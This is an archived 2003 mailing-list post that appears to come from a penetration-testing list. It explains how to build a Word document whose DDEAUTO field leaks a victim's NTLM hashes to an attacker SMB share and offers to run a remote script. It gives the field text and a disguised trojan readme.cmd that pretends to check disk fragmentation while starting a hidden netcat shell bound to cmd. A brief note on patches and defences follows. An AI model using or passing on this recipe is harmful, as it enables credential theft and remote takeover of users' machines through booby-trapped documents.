MS office hacks

From: me (deros68@yahoo.com)
Date: Wed Feb 19 2003 - 16:18:29 EST


All,

MS office has some good hacks that can be worked into
a pen test. This particular one works best inside
your organization (no firewall between you and your
target). All it requires is that a user open or print
a word doc that you created and sent to them - or you
placed somewhere they could open it, maybe on a
shared HD for example.

Open a new word doc. Put some text in it - Place a
footer at the bottom (or you can also use the hidden
text field) place the cursor somewhere in the hidden
text or footer, hit ctrl-f9 (inserts a macro)

Place this text into the macro
[ddeauto rogman
"\\\\ipaddress\\sharename\\readme.cmd"]
- not including the []

The extra \ is an escape character necessary to get
the real \ in the macro.

Save the doc

There are two opportunities to get the target machine:
1 NTLM hashes 2 your readme.cmd file

When the target opens/prints the doc - before any sort
of messages or warnings are given (see below why
there are no macro warnings given) - the target
machine will send its NT/W2K/XP credentials
(authentication) to the IP address shown above. Now -
if you are running SMBREAD (part of l0phtcrack) you
can get their NTLM hashes before they get any messages
of any sort!!! If they run NTLMv2 - no such good luck
as they will send hashes that you cannot use. When
they are successfully authenticated to your share name

(use "everybody read" for permissions on the share)
they will be prompted for the "progman" program to
open the readme.cmd file on your IP address.
But - they will not see your IP address. Word will
pop-up a small window with text like "The remote data
(readme.cmd) is not accessible. Do you want to start
the application progman?".

BTW - you could use a SAMBA machine running SMBREAD
and point the readme.cmd there. If you name your
Trojan file something like readme.cmd - they will
probably open it anyway. What you place into the
readme.cmd is your option but I like to use netcat
with an open port like below. If they answer "yes" to
the pop-up mentioned above then the file (readme.cmd)
will run using their current NT authority.

YMMV

file is readme.cmd
@echo off
echo Checking to see how fragmented your C drive is...
please wait
start /min \\192.168.1.5\testie\nc -dLp 81 -e
%comspec%
echo You have no disk fragmentation problems at this
time - OK. Please close this window..
end of readme.cmd

MS has patches for Word 97 & W 2000 - but as in the
article below they have problems - one problem is
that you can use DDE or ddeauto to run the hack - and
plain DDE is not trapped by the patch !!

If you want some more information. -see this URL
http://www.woodyswatch.com/office/archtemplate.asp?v7-n49

BTW - Woody’s office watch is an excellent source of
information and humor regarding the MS office
products.

I figured out the DDE & DDEAUTO before I saw the above

article. The macro warning is not triggered by the
DDE or DDEAUTO command until the patch is applied.
Also - DDE services & progman are default
services/programs that exist in NT,W2K & XP

There are other hacks that you can do - such as
launch IE with no console attached - pointing to your
XSS site !!!

I have patched my Word 97 and am very careful about
opening Word docs from unknown sources! I have also
disabled DDE services. BTW DDE & DDEAUTO can also
be used in Excel spreadsheets. I am not certain if MS

has patched them. All OLE programs may use DDE
services. PPT, Access, ????

Cheers

__________________________________________________
Do you Yahoo!?
Yahoo! Shopping - Send Flowers for Valentine's Day
http://shopping.yahoo.com

----------------------------------------------------------------------------

Do you know the base address of the Global Offset Table (GOT) on a Solaris 8
box?
CORE IMPACT does.
www.securityfocus.com/core



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:28 EDT